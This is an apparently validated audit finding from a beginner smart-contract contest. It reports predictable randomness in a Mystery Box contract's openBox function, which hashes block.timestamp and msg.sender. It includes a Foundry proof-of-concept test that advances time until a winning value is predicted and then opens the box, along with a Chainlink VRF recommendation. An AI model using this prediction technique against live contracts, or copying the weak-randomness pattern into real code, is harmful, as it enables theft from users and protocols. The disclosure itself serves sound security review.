Mystery Box

First Flight #25
Beginner FriendlyFoundry
100 EXP
View results
Submission Details
Severity: medium
Valid

User can predict the rarity and reward of box

Summary

Randomness is predicatable in the openbox function.

Vulnerability Details

The openbox randvalue is predicted using the following logic

// Generate a random number between 0 and 99
uint256 randomValue = uint256(keccak256(abi.encodePacked(block.timestamp, msg.sender))) % 100;

Both block.timestamp and msg.sender is predictable

POC:

function test_randomness() public{
vm.deal(user1,0.1 ether);
uint winnings=0;
uint time=1;
vm.prank(user1);
mysteryBox.buyBox{value: 0.1 ether}();
console.log(address(user1).balance);
while (winnings==0){
vm.warp(++time);
if ((uint256(keccak256(abi.encodePacked(block.timestamp, msg.sender))) % 100)==99){//Making sure i always win
vm.prank(user1);
mysteryBox.openBox();
// the following block will be executed only if the user is going to win the challenge
winnings=1;
break;
}
}
vm.assertEq(winnings, 1);
}

Impact

The user can predict his/her/they/them Chances of winning the lottery every single-time in some cases even winning it outright.

Tools Used

Foundry 0.2.0

Recommendations

Consider using a decentralized oracle for the generation of random numbers, such as Chainlinks VRF.

Updates

Appeal created

inallhonesty Lead Judge 9 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Weak Randomness

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.